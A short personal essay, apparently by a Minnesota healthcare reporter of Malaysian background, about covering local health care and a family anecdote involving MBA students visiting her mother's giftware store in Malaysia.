Now in one of those crazy twists that life brings, I’m a foreigner in Minnesota, writing local news for a local audience.
I landed here when I married a Minnesotan. For a healthcare reporter, there’s no better place to be.
From Mayo Clinic to UnitedHealth, there are so many local organizations with national and even global reach. Many of the biggest trends in health care – HMOs, retail clinics, health savings accounts – started here.
I regularly hear from people around the country who have read my stories online. But it’s the calls and e-mails I get from Minnesotans that really make my day. Whether they’re calling with a tip, or praise, or a complaint, people care about this stuff.
Sometimes, my bifurcated life can lead to some interesting connections.
My mother’s family owns a giftware business in Malaysia. Last week, a group of MBA students from the Carlson School wandered into the store. They spied a book I had written about the family business. The author now lives in Minnesota, someone told them.
“We know,” they replied. “We see her name in the paper every day.”
As you can imagine, my mom really liked that.
